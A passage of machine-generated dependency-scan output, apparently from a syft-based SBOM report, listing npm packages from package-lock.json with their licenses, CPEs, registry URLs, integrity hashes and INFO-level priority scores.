ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: decamelize 1.2.0'
|
|
title: decamelize 1.2.0
|
|
description: 'Package discovered: decamelize 1.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 56044f762e36d59b
|
|
name: decamelize
|
|
version: 1.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:decamelize:decamelize:1.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/decamelize@1.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/decamelize/-/decamelize-1.2.0.tgz
|
|
integrity: sha512-z2S+W9X73hAUUki+N+9Za2lBlun89zigOyGrsax+KUQ6wKW4ZoWpEYBkGhQjwAjjDCkWxhY0VKEhk8wzY7F5cA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2d9026954da43a27
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: decimal.js-light 2.5.1'
|
|
title: decimal.js-light 2.5.1
|
|
description: 'Package discovered: decimal.js-light 2.5.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 6135efdaaf1822bb
|
|
name: decimal.js-light
|
|
version: 2.5.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:decimal.js-light:decimal.js-light:2.5.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:decimal.js-light:decimal.js_light:2.5.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:decimal.js_light:decimal.js-light:2.5.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:decimal.js_light:decimal.js_light:2.5.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:decimal.js:decimal.js-light:2.5.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:decimal.js:decimal.js_light:2.5.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/decimal.js-light@2.5.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/decimal.js-light/-/decimal.js-light-2.5.1.tgz
|
|
integrity: sha512-qIMFpTMZmny+MMIitAB6D7iVPEorVw6YQRWkvarTkT4tBeSLLiHzcwj6q0MmYSFCiVpiqPJTJEYIrpcPzVEIvg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 8e421fc3fe27aa9c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: deepmerge 4.3.1'
|
|
title: deepmerge 4.3.1
|
|
description: 'Package discovered: deepmerge 4.3.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 6fcde9d497e83e33
|
|
name: deepmerge
|
|
version: 4.3.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:deepmerge:deepmerge:4.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/deepmerge@4.3.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz
|
|
integrity: sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: bd6d6c864c2f97b9
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: delayed-stream 1.0.0'
|
|
title: delayed-stream 1.0.0
|
|
description: 'Package discovered: delayed-stream 1.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c23340a58ec36159
|
|
name: delayed-stream
|
|
version: 1.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:delayed-stream:delayed-stream:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:delayed-stream:delayed_stream:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:delayed_stream:delayed-stream:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:delayed_stream:delayed_stream:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:delayed:delayed-stream:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:delayed:delayed_stream:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/delayed-stream@1.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz
|
|
integrity: sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b4af690e8812705b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: denque 2.1.0'
|
|
title: denque 2.1.0
|
|
description: 'Package discovered: denque 2.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b292c74570fb7df3
|
|
name: denque
|
|
version: 2.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:denque:denque:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/denque@2.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/denque/-/denque-2.1.0.tgz
|
|
integrity: sha512-HVQE3AAb/pxF8fQAoiqpvg9i3evqug3hoiwakOyZAwJm+6vZehbkYXZ0l4JxS+I3QxM97v5aaRNhj8v5oBhekw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 86dec3bfd9bed666
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: depd 2.0.0'
|
|
title: depd 2.0.0
|
|
description: 'Package discovered: depd 2.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 82a407fce3facea3
|
|
name: depd
|
|
version: 2.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:depd:depd:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/depd@2.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/depd/-/depd-2.0.0.tgz
|
|
integrity: sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a7d6bc7c01ff6fdb
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: destroy 1.2.0'
|
|
title: destroy 1.2.0
|
|
description: 'Package discovered: destroy 1.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 916ee50fe6c61deb
|
|
name: destroy
|
|
version: 1.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:destroy:destroy:1.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/destroy@1.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/destroy/-/destroy-1.2.0.tgz
|
|
integrity: sha512-2sJGJTaXIIaR1w4iJSNoN0hnMY7Gpc/n8D4qSCJw8QqFWXf7cuAgnEHxBpweaVcPevC2l3KpjYCx3NypQQgaJg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b1baa34830820f96
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: detect-libc 2.1.2'
|
|
title: detect-libc 2.1.2
|
|
description: 'Package discovered: detect-libc 2.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: cd3c75639d40cfa6
|
|
name: detect-libc
|
|
version: 2.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:detect-libc:detect-libc:2.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:detect-libc:detect_libc:2.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:detect_libc:detect-libc:2.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:detect_libc:detect_libc:2.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:detect:detect-libc:2.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:detect:detect_libc:2.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/detect-libc@2.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/detect-libc/-/detect-libc-2.1.2.tgz
|
|
integrity: sha512-Btj2BOOO83o3WyH59e8MgXsxEQVcarkUOpEYrubB0urwnN10yQ364rsiByU11nZlqWYZm05i/of7io4mzihBtQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d9872bdf37f54c1c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: dfa 1.2.0'
|
|
title: dfa 1.2.0
|
|
description: 'Package discovered: dfa 1.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 32140b01170f2db8
|
|
name: dfa
|
|
version: 1.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:dfa:dfa:1.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/dfa@1.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/dfa/-/dfa-1.2.0.tgz
|
|
integrity: sha512-ED3jP8saaweFTjeGX8HQPjeC1YYyZs98jGNZx6IiBvxW7JG5v492kamAQB3m2wop07CvU/RQmzcKr6bgcC5D/Q==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9f98c7e106363761
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: didyoumean 1.2.2'
|
|
title: didyoumean 1.2.2
|
|
description: 'Package discovered: didyoumean 1.2.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 88295af7ba0997fd
|
|
name: didyoumean
|
|
version: 1.2.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:didyoumean:didyoumean:1.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/didyoumean@1.2.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/didyoumean/-/didyoumean-1.2.2.tgz
|
|
integrity: sha512-gxtyfqMg7GKyhQmb056K7M3xszy/myH8w+B4RT+QXBQsvAOdc3XymqDDPHx1BgPgsdAA5SIifona89YtRATDzw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 1b1c014679b0d671
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: dijkstrajs 1.0.3'
|
|
title: dijkstrajs 1.0.3
|
|
description: 'Package discovered: dijkstrajs 1.0.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 7a3b023286e84986
|
|
name: dijkstrajs
|
|
version: 1.0.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:dijkstrajs:dijkstrajs:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/dijkstrajs@1.0.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/dijkstrajs/-/dijkstrajs-1.0.3.tgz
|
|
integrity: sha512-qiSlmBq9+BCdCA/L46dw8Uy93mloxsPSbwnm5yrKn2vMPiy8KyAskTF6zuV/j5BMsmOGZDPs7KjU+mjb670kfA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4fdc8b3106066f47
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: dlv 1.1.3'
|
|
title: dlv 1.1.3
|
|
description: 'Package discovered: dlv 1.1.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 6145214b9f2f7148
|
|
name: dlv
|
|
version: 1.1.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:dlv:dlv:1.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/dlv@1.1.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/dlv/-/dlv-1.1.3.tgz
|
|
integrity: sha512-+HlytyjlPKnIG8XuRG8WvmBP8xs8P71y+SKKS6ZXWoEgLuePxtDoUEiH7WkdePWrQ5JBpE6aoVqfZfJUQkjXwA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4d01289dd001e612
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: dom-helpers 5.2.1'
|
|
title: dom-helpers 5.2.1
|
|
description: 'Package discovered: dom-helpers 5.2.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 22b93db9f5eba040
|
|
name: dom-helpers
|
|
version: 5.2.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:dom-helpers:dom-helpers:5.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:dom-helpers:dom_helpers:5.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:dom_helpers:dom-helpers:5.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:dom_helpers:dom_helpers:5.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:dom:dom-helpers:5.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:dom:dom_helpers:5.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/dom-helpers@5.2.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/dom-helpers/-/dom-helpers-5.2.1.tgz
|
|
integrity: sha512-nRCa7CK3VTrM2NmGkIy4cbK7IZlgBE/PYMn55rrXefr5xXDP0LdtfPnblFDoVdcAfslJ7or6iqAUnx0CCGIWQA==
|
|
dependencies:
|
|
'@babel/runtime': ^7.8.7
|
|
csstype: ^3.0.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 594471832719edc2
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
